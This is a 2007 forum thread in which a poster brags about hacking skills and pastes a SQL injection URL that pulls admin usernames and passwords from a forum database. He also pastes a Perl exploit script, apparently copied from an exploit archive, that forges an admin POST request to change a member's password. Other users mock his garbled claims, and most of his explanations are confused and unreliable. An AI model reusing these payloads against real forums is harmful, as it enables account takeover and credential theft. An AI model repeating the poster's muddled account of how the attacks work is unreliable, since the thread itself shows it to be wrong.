|
I made a simple code that gives you ALOT[/b] of access to your users, I don't use this code. This is how it workes, It is a .exe called an "exploit" and some people say it gives you "unfare advantages" over your users. It is remotly like a virus, you can use this code for good, or bad you can use alot of programs for this such as MS Exall or I preffer Frameworkthe code is kinda malatios so keep it hidden and shut your mouth if you use it, and try as hard as you can to keep it away from the public and don't let Site Advisor catch you using the advantages! and If the codes infect your computer then the proccess is complete, I made the .exe simply grant access to the users password on the site, not other sites and won't grant full access to computers or IPs. DO NOT ABUSE THIS PRIVALAGE!![/b][/u]
Last Edit: May 31, 2007 23:33:36 GMT by H@kr 3XP|_0!tz
|
- Large image removed -
|
|
|
|
|
lawl
|
- Large image removed -
|
|
|
|
So, out of curiosity, why all the syntax errors?
|
|
|
|
|
So, out of curiosity, why all the syntax errors? Because rofl, that's why.
|
|
|
|
So, out of curiosity, why all the syntax errors? You all don't know how to manage exploits the [/li][li] are important, simple javaScript is nothing compared to my work!! If you want more exploit here they go! HEADER[/u] http://[target]/[path]/forum.asp?H_ID=1%20union+select+0,0,ID,J_User,0,0,0,J_Pass,ID,0+from+adminlogins+where+ID=1&Name=Allm%E4nt like many codes this one is a link (it leads to a malatious site do not click it) The code above leads the injection for the code possible without trace, so you can accually post the exploit with an effect. ALSO IN HEADER/b]
#!perl #http://ipigroup.org/downloads/forums.zip #Bl0od3r #United States #Whassup to all members of http://studiozero44.com/index.cgi #special to chris use IO::Socket; if (@ARGV<4) { &header; } else { &start };
sub start() { $host=$ARGV[0]; $path=$ARGV[1]; $user=$ARGV[2]; $passwd=$ARGV[3]; $post="usersname=".$user."&password=".$passwd."&email=test%40test.com&name=Dummy+user&tagline=Im+a+dumy+user&location=Ohio&bday=1983-11-20&job=Being+a+test+dummy&interests=Anything&bio=I%5C%5C%5C%27ve+been+sitting+on+this+db+my+whole+life.++HELP%21&signature=This+is+my+signature.&url=http%3A%2F%2Fipigroup.org&aim=myaim&yahoo=myyahoo&msn=mymsn%40hotmail.com&icq=546546&submitupdate=Update"; $len=length($post); $sock=IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$host",PeerPort=>"80") or die ("Error"); print $sock "POST ".$path."admin/index.php?p=members&edit=".$chris." HTTP/1.0\n"; print $sock "Host: ".$host."\n"; print $sock "Content-Type: application/x-www-form-urlencoded\n"; print $sock "Content-Length: ".$len."\n\n"; print $sock $post;
print "[+]Seems like your account has been created!Now try to login in :"; print "\n[+]User:$user\t[+]Password:$passwd"; }
sub header() { print(" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \t\t~~iPrimal Forums Users(ChangePass) 3xPl0!t~~ \t\t[+]By Mega-Ballin-Pimp-$ev \t\t[+]A.K.A. $eve$hot \t\t[+]A.K.A. lynxgawd \t\t[+]Usage:script.pl owned.org /script/ admin yes ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ "); }
# metasploit.com [2007-05-31]
The top one will send a PM to the admion and change his password I edited it to send to "chris" this will grant full access to chris to the user, you can do this to anybody to check the passwords they entered
FOOTER[/u] http://www.metasploit.com w00t!! PWNED!!! and if you want more you can ttalk to me. I have also igured out how to screw over a proboards, you can add ?action=hack/headersandfooters andadd a code (I will not post it so, I cannot tell people how to hack this site) but you cannot write in the footers, you can copy/paste them without the code when you have posted the hidden code you can have full admin. And have privillages that the admin now doesen't even have........ yet. Chris, PM me.
|
- Large image removed -
|
|
|
|
Anyway, what syntax errors where you reffering to???
|
- Large image removed -
|
|
|
|
The ones that were supposed to be in perl, not javascipt.
|
#intj (Mastermind)^
|
|
|
|
The ones that were supposed to be in perl, not javascipt. What are you all not getting? I know everything there is to know about that site!! Me adn Alex made it in '03!! The proboards H/F Are not only JavaScript, but they are any type of script, if you would read the whole metasploit page you would understand the scripts.
Last Edit: Jun 3, 2007 2:07:06 GMT by H@kr 3XP|_0!tz
|
- Large image removed -
|
|
|
|
Yes, they're not only JavaScript, but you also can not execute Perl in headers/footers mate. I've tried quite a few times. ProBoards isn't 100% secure, but it also isn't vulnerable to something so easily executed.
|
|
|
|
|
lol, priceless
|
"In the end, we will not remember the words of our enemies, but the silence of our friends." Martin Luther King
|
|
|
|
*chuckles* This thread gave me a few laughs
|
|
|
|
|
roflmao.
|
|
|
|